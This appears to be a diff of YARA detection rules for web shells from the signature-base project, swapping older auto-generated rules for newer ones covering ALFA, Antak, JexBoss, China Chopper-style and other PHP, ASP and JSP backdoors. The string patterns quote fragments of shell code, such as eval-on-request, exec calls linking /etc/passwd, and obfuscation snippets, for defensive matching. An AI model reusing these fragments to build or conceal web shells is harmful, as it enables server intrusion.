+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "027544baa10259939780e97dc908bd43f0fb940510119fc4cce0883f3dd88275"
 
 	strings:
-		$s0 = "RhViRYOzz"
-		$s1 = "d\\O!jWW"
-		$s2 = "bc!jWW"
-		$s3 = "0W[&{l"
-		$s4 = "[INhQ@\\"
+		$x1 = "@exec('./bypass/ln -s /etc/passwd 1.php');" fullword ascii
+		$x2 = "echo \"<iframe src=mysqldumper/index.php width=100% height=100% frameborder=0></iframe> \";" fullword ascii
+		$x3 = "@exec('tar -xvf mysqldumper.tar.gz');" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x213c and filesize < 100KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_FSO_S_EFSO_2
+rule SIGNATURE_BASE_Unknown_0F06C5D1B32F4994C3B3Abf8Bb76D5468F105167 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file EFSO_2.asp"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e88d324c-1dee-5b07-b528-cf760e3ee7a6"
-		date = "2025-03-29"
+		id = "efd09da2-f232-5a21-99c8-dc2bf00baa73"
+		date = "2016-09-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8384-L8396"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9627-L9642"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a341270f9ebd01320a7490c12cb2e64c"
-		logic_hash = "462c713e5d4fb6d0db91b14bfacdca73f780559ba2dad80988c356ee1a3d369d"
+		logic_hash = "6f4bdf8aecd527335c29a8e964c7d8688c3e77419595d3fd10a6cf3704711816"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6362372850ac7455fa9461ed0483032a1886543f213a431f81a2ac76d383b47e"
 
 	strings:
-		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
-		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
+		$s1 = "$check = $_SERVER['DOCUMENT_ROOT'] . \"/libraries/lola.php\" ;" fullword ascii
+		$s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
+		$s3 = "fwrite($fp,base64_decode('" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x6324 and filesize < 2KB and all of them )
 }
-rule SIGNATURE_BASE_Thelast_Index3
+rule SIGNATURE_BASE_Wsoshell_0Bbebaf46F87718Caba581163D4Beed56Ddf73A7 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file index3.php"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "41310217-b9a7-5360-80c4-7d0a3969f848"
-		date = "2025-03-29"
+		id = "92165645-5392-588d-ba2a-5ef6b7499a5a"
+		date = "2016-09-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8397-L8408"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9644-L9658"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cceff6dc247aaa25512bad22120a14b4"
-		logic_hash = "3700141ca2cf53f49618e2d4cab8866efccdce843921f1733b3d6260b8feea68"
+		logic_hash = "bf5090fb909fea690c8a2af3cca35136eda3b9773976189158c25fb8877cc266"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d053086907aed21fbb6019bf9e644d2bae61c63563c4c3b948d755db3e78f395"
 
 	strings:
-		$s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"
+		$s8 = "$default_charset='Wi'.'ndo.'.'ws-12'.'51';" fullword ascii
+		$s9 = "$mosimage_session = \"" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x3f3c and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Adjustcr
+rule SIGNATURE_BASE_Webshell_Generic_1609_A : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file adjustcr.exe"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4b3d9409-60e8-502a-b37b-1e06d57c9b0b"
-		date = "2025-03-29"
+		id = "4b7db4db-8699-5b4d-ab90-ce79f1160984"
+		date = "2016-09-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8409-L8423"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9660-L9675"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "17037fa684ef4c90a25ec5674dac2eb6"
-		logic_hash = "d2a86083ff5cb34a0453f812e2d316c63342e529f00099a8869fa7e0a43321ef"
+		logic_hash = "e5a4bba3a7b1c712203fcc8b85e4089b0ff18a26e96f5a04529616dbfb9de651"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "c817a490cfd4d6377c15c9ac9bcfa136f4a45ff5b40c74f15216c030f657d035"
+		hash3 = "69b9d55ea2eb4a0d9cfe3b21b0c112c31ea197d1cb00493d1dddc78b90c5745e"
 
 	strings:
-		$s0 = "$Info: This file is packed with the UPX executable packer $"
-		$s2 = "$License: NRV for UPX is distributed under special license $"
-		$s6 = "AdjustCR Carr"
-		$s7 = "ION\\System\\FloatingPo"
+		$s1 = "return $qwery45234dws($b);" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x3f3c and 1 of them )
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Xishell
+rule SIGNATURE_BASE_Nishang_Webshell : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file xIShell.php"
+		description = "Detects a ASPX web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "32a32a9a-8d5f-5b3f-8ff4-560555f0ae1e"
-		date = "2025-03-29"
+		id = "785e6da7-097e-598b-9799-ffe43738d718"
+		date = "2016-09-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8424-L8435"
+		reference = "https://github.com/samratashok/nishang"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9677-L9692"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "997c8437c0621b4b753a546a53a88674"
-		logic_hash = "13393bc72477ab9a4ebc16b409de8ed73e086cc41f25f34315d11401b63c2471"
+		logic_hash = "b8a3c8e80a4e41e556e2d65df4126d84723ded6ca623302afc4cc328bded346c"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"
+		$s1 = "psi.Arguments = \"-noninteractive \" + \"-executionpolicy bypass \" + arg;" ascii
+		$s2 = "output.Text += \"\nPS> \" + console.Text + \"\n\" + do_ps(console.Text);" ascii
+		$s3 = "<title>Antak Webshell</title>" fullword ascii
+		$s4 = "<asp:Button ID=\"executesql\" runat=\"server\" Text=\"Execute SQL Query\"" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x253C and filesize < 100KB and 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Hytop_Apppack_2005
+rule SIGNATURE_BASE_PHP_Webshell_1_Feb17 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005.asp"
+		description = "Detects a simple cloaked PHP web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "67c86d16-a962-5502-8c39-0a6e3dc04031"
-		date = "2025-03-29"
+		id = "eedf87c9-2dab-530d-b5d8-a4c2ebc87821"
+		date = "2017-02-28"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8436-L8447"
+		reference = "https://isc.sans.edu/diary/Analysis+of+a+Simple+PHP+Backdoor/22127"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9704-L9725"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
-		logic_hash = "0de4800291132efca24b40bebcc895d6873110214c8cbf8384317208e0d9db82"
+		logic_hash = "c8576b20ec3f81b3ef0aa5a508c94e07d591d68767cb4598ad10778b4305915d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"
+		$h1 = "<?php ${\"\\x" ascii
+		$x1 = "\";global$auth;function sh_decrypt_phase($data,$key){${\"" ascii
+		$x2 = "global$auth;return sh_decrypt_phase(sh_decrypt_phase($" ascii
+		$x3 = "]}[\"\x64\"]);}}echo " ascii
+		$x4 = "\"=>@phpversion(),\"\\x" ascii
+		$s1 = "$i=Array(\"pv\"=>@phpversion(),\"sv\"" ascii
+		$s3 = "$data = @unserialize(sh_decrypt(@base64_decode($data),$data_key));" ascii
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x68703f3c and ( $h1 at 0 and 1 of them ) or 2 of them
 }
-rule SIGNATURE_BASE_Xssshell
+rule SIGNATURE_BASE_Webshell_Tiny_JSP_2 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file xssshell.asp"
+		description = "Detects a tiny webshell - chine chopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ef89653c-5814-525a-b04e-4326a80f780c"
-		date = "2025-03-29"
+		id = "b628c4f9-eb07-592d-834a-5c94e41987da"
+		date = "2015-12-05"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8448-L8459"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9727-L9739"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"
-		logic_hash = "6b0e602b523f58ec61850b4ba2e69da4fe4bf2833fb45e529785a398445db127"
-		score = 75
+		logic_hash = "6fd514df9d53293a8cfd4b9c807f993558e39979592aa221f18cd76079c00fb7"
+		score = 100
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma"
+		$s1 = "<%eval(Request(" nocase
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x253c and filesize < 40 and all of them
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Usr
+rule SIGNATURE_BASE_Wordpress_Config_Webshell_Preprend : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file usr.php"
+		description = "Webshell that uses standard Wordpress wp-config.php file and appends the malicious code in front of it"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ab1825fe-96aa-5d97-acd6-eac43a12b237"
-		date = "2025-03-29"
+		id = "2a432c53-5dee-5a2e-9ccf-9e5d52713af9"
+		date = "2017-06-25"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8460-L8471"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9751-L9773"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ade3357520325af50c9098dc8a21a024"
-		logic_hash = "f5fd4a4c1b531b23b09505d302dc27d7ba2eb733fcf313c04ba9085b090f7cbe"
-		score = 75
+		logic_hash = "97d7b85fa191380fe8b26ea60c8735a8f7179acc3a496ff0fc0dc5eefde2fe8a"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"
+		$x1 = " * @package WordPress" fullword ascii
+		$s1 = "define('DB_NAME'," ascii
+		$s2 = "require_once(ABSPATH . 'wp-settings.php');" ascii
+		$fp1 = "iThemes Security Config" ascii
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x68703f3c and filesize < 400KB and $x1 and all of ( $s* ) and not $x1 in ( 0 .. 1000 ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_FSO_S_Phpinj
+rule SIGNATURE_BASE_PAS_Webshell_Encoded : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file phpinj.php"
+		description = "Detects a PAS webshell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5d84d518-0e18-517f-890b-e296ac265c50"
-		date = "2025-03-29"
+		id = "6cb547ad-7a97-5c3d-83e1-114ea798ddb8"
+		date = "2017-07-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8472-L8483"
+		reference = "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9784-L9819"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dd39d17e9baca0363cc1c3664e608929"
-		logic_hash = "de4ac200f5426ec4c6fef21d5fbc37281811569a3e71a9bcb6fa51d13eb600a4"
-		score = 75
+		logic_hash = "59f4f8caa60c2367b46f6af1aefa62e03e228b382ff58be3a27dad527a685eca"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"
+		$head1 = "<?php $____=" fullword ascii
+		$head2 = "'base'.(32*2).'"
+		$enc1 = "isset($_COOKIE['___']" ascii
+		$enc2 = "if($___!==NULL){" ascii
+		$enc3 = ").substr(md5(strrev($" ascii
+		$enc4 = "]))%256);$" ascii
+		$enc5 = "]))@setcookie('" ascii
+		$enc6 = "]=chr(( ord($_" ascii
+		$x1 = { 3D 0A 27 29 29 3B 69 66 28 69 73 73 65 74 28 24 5F 43 4F 4F 4B 49 45 5B 27 }
+		$foot1 = "value=\"\"/><input type=\"submit\" value=\"&gt;\"/></form>"
+		$foot2 = "();}} @header(\"Status: 404 Not Found\"); ?>"
 
 	condition:
-		all of them
+		( uint32( 0 ) == 0x68703f3c and filesize < 80KB and ( 3 of them or $head1 at 0 or $head2 in ( 0 .. 20 ) or 1 of ( $x* ) ) ) or $foot1 at ( filesize -52 ) or $foot2 at ( filesize -44 )
 }
-rule SIGNATURE_BASE_Xssshell_Db
+rule SIGNATURE_BASE_ALFA_SHELL : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file db.asp"
+		description = "Detects web shell often used by Iranian APT groups"
 		author = "Florian Roth (Nextron Systems)"
-		id = "94bb2297-95a2-5442-bb16-fb079a29606e"
-		date = "2025-03-29"
+		id = "f0be44ec-bff0-5d01-aabd-df7aa05383e3"
+		date = "2017-09-21"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8484-L8495"
+		reference = "Internal Research - APT33"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9831-L9849"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cb62e2ec40addd4b9930a9e270f5b318"
-		logic_hash = "3fdbaa17c12abef8576bf859065d90f4b6e80c187af734b71b26a1bd5d073e86"
+		logic_hash = "651568b2b95c9e5c2b60fb3245e5afe4290235979e3df15bad96ccd08ae234ef"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a39d8823d54c55e60a7395772e50d116408804c1a5368391a1e5871dbdc83547"
 
 	strings:
-		$s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"
+		$x1 = "$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64')" ascii
+		$x2 = "#solevisible@gmail.com" fullword ascii
+		$x3 = "'login_page' => '500',//gui or 500 or 403 or 404" fullword ascii
+		$x4 = "$GLOBALS['__ALFA__']" fullword ascii
+		$x5 = "if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')" ascii
+		$f1 = { 76 2F 38 76 2F 36 76 2F 2B 76 2F 2F 66 38 46 27 29 3B 3F 3E 0D 0A }
 
 	condition:
-		all of them
+		( filesize < 900KB and 2 of ( $x* ) or $f1 at ( filesize -22 ) )
 }
-rule SIGNATURE_BASE_PHP_Sh
+rule SIGNATURE_BASE_Webshell_FOPO_Obfuscation_APT_ON_Nov17_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file sh.php"
+		description = "Detects malware from NK APT incident DE"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08dff4db-3b1c-5702-a8c9-efaedf83c4ff"
-		date = "2025-03-29"
+		id = "0122bb03-8ff0-554d-8fee-458f0ddd7664"
+		date = "2017-11-17"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8496-L8507"
+		reference = "Internal Research - ON"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9851-L9870"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1e9e879d49eb0634871e9b36f99fe528"
-		logic_hash = "da0b572f116cc5c55e8d7469f222896d602d09be4761a0e2139fc8ce67ac4050"
+		logic_hash = "3c5bc3ee0218d4ce6902e49d7f938264ecd158f1f458e2fcef878f06f003ed08"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ed6e2e0027d3f564f5ce438984dc8a54577df822ce56ce079c60c99a91d5ffb1"
 
 	strings:
-		$s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"
+		$x1 = "Obfuscation provided by FOPO" fullword ascii
+		$s1 = "\";@eval($" ascii
+		$f1 = { 22 29 29 3B 0D 0A 3F 3E }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x3f3c and filesize < 800KB and ( $x1 or ( $s1 in ( 0 .. 350 ) and $f1 at ( filesize -23 ) ) )
 }
-rule SIGNATURE_BASE_Xssshell_Default
+rule SIGNATURE_BASE_Webshell_Jexboss_JSP_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file default.asp"
+		description = "Detects JexBoss JSPs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1c221572-4cb5-5806-a856-0f857dba230a"
-		date = "2025-03-29"
+		id = "4fe7a20b-dc2b-509b-bcf8-e3bfbbe7431a"
+		date = "2018-11-08"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8508-L8519"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9872-L9889"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d156782ae5e0b3724de3227b42fcaf2f"
-		logic_hash = "6a8772a8a6399c3266abcc22a3c55eda70ec9703346398f5f1768bbd35974f8c"
+		logic_hash = "f540bbc88bffd0c961837416bd5166fd3cb54b6124ffffbf1cd60e49ab01bd30"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "41e0fb374e5d30b2e2a362a2718a5bf16e73127e22f0dfc89fdb17acbe89efdf"
 
 	strings:
-		$s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"
+		$x1 = "equals(\"jexboss\")"
+		$x2 = "%><pre><%if(request.getParameter(\"ppp\") != null &&" ascii
+		$s1 = "<%@ page import=\"java.util.*,java.io.*\"%><pre><% if (request.getParameter(\""
+		$s2 = "!= null && request.getHeader(\"user-agent\"" ascii
+		$s3 = "String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }}%>" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x253c and filesize < 1KB and 1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_Editserver_2
+rule SIGNATURE_BASE_Webshell_Jexboss_WAR_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file EditServer.exe"
+		description = "Detects JexBoss versions in WAR form"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bd254bd9-fd23-5807-9347-2a559089b7c5"
-		date = "2025-03-29"
+		id = "0973f6cf-8a5f-5449-812e-36aa6b9939df"
+		date = "2018-11-08"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8520-L8533"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9891-L9914"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"
-		logic_hash = "c581936928ce0f1061feb5665c743f14f12a9f875e360f40cc064f3047b23adf"
+		logic_hash = "ee9cb22496d2e36d215caa9c7e295b41cb8434322a0097bbc3d1a365dce0c156"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "6271775ab144ce9bb9138bf054b149b5813d3beb96338993c6de35330f566092"
+		hash2 = "6f14a63c3034d3762da8b3ad4592a8209a0c88beebcb9f9bd11b40e879f74eaf"
 
 	strings:
-		$s0 = "@HOTMAIL.COM"
-		$s1 = "Press Any Ke"
-		$s3 = "glish MenuZ"
+		$ = "jbossass" fullword ascii
+		$ = "jexws.jsp" fullword ascii
+		$ = "jexws.jspPK" fullword ascii
+		$ = "jexws1.jsp" fullword ascii
+		$ = "jexws1.jspPK" fullword ascii
+		$ = "jexws2.jsp" fullword ascii
+		$ = "jexws2.jspPK" fullword ascii
+		$ = "jexws3.jsp" fullword ascii
+		$ = "jexws3.jspPK" fullword ascii
+		$ = "jexws4.jsp" fullword ascii
+		$ = "jexws4.jspPK" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x4b50 and filesize < 4KB and 1 of them
 }
-rule SIGNATURE_BASE_By064Cli
+rule SIGNATURE_BASE_Webshell_Tinyasp : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file by064cli.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9ea88f0c-9275-5567-a4d9-0545de8044d1"
-		date = "2025-03-29"
+		description = "Detects 24 byte ASP webshell and variations"
+		author = "Jeff Beley"
+		id = "38b1f61b-e506-59b2-9157-d0345431c429"
+		date = "2019-01-09"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8534-L8546"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9916-L9927"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "10e0dff366968b770ae929505d2a9885"
-		logic_hash = "51efd5c510efc6657ae175af47b09437ae70eb0237d88ffdf3cdae365d0ec7be"
+		logic_hash = "d8b7db89ea623d5bcf14476779df727827cfc752d4c6ba4208445fd7305e6943"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 83
+		tags = "FILE"
+		hash1 = "1f29905348e136b66d4ff6c1494d6008ea13f9551ad5aa9b991893a31b37e452"
 
 	strings:
-		$s7 = "packet dropped,redirecting"
-		$s9 = "input the password(the default one is 'by')"
+		$s1 = "Execute Request" ascii wide nocase
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x253c and filesize < 150 and 1 of them
 }
-rule SIGNATURE_BASE_Mithril_Dlltest
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Mar21_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
+		description = "Detects ASPX Web Shells"
 		author = "Florian Roth (Nextron Systems)"
-		id = "59a6bfb6-c099-56cd-b40e-3e92ea0eb7d3"
-		date = "2025-03-29"
+		id = "52884135-6b86-5e3e-a866-36a812d5a9af"
+		date = "2021-03-12"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8547-L8559"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9929-L9954"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"
-		logic_hash = "c8c8d1b75ed4eb4bc66a762e53aa6b3ab439e96ef464a8b9ffa4dff887986465"
-		score = 50
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "acc0d67326d1f764d6fc54681b38f491c55968ec34e40d181426cfcf418eeb21"
+		score = 75
+		quality = 83
+		tags = "FILE"
+		hash1 = "10b6e82125a2ddf3cc31a238e0d0c71a64f902e0d77171766713affede03174d"
+		hash2 = "170bee832df176aac0a3c6c7d5aa3fee413b4572030a24c994a97e70f6648ffc"
+		hash3 = "31c4d1fc81c052e269866deff324dffb215e7d481a47a2b6357a572a3e685d90"
+		hash4 = "41b5c26ac194439612b68e9ec6a638eceaf00842c347ffa551eb009ef6c015a3"
+		hash5 = "4b645bc773acde2b3cc204e77ac27c3f6991046c3b75f42d12bc90ec29cff9e3"
+		hash6 = "602bb701b78895d4de32f5e78f3c511e5298ba244b29641b11a7c1c483789859"
+		hash7 = "7ac47a17c511e25c06a53a1c7a5fbbf05f41f047a4a40b71afa81ce7b59f4b03"
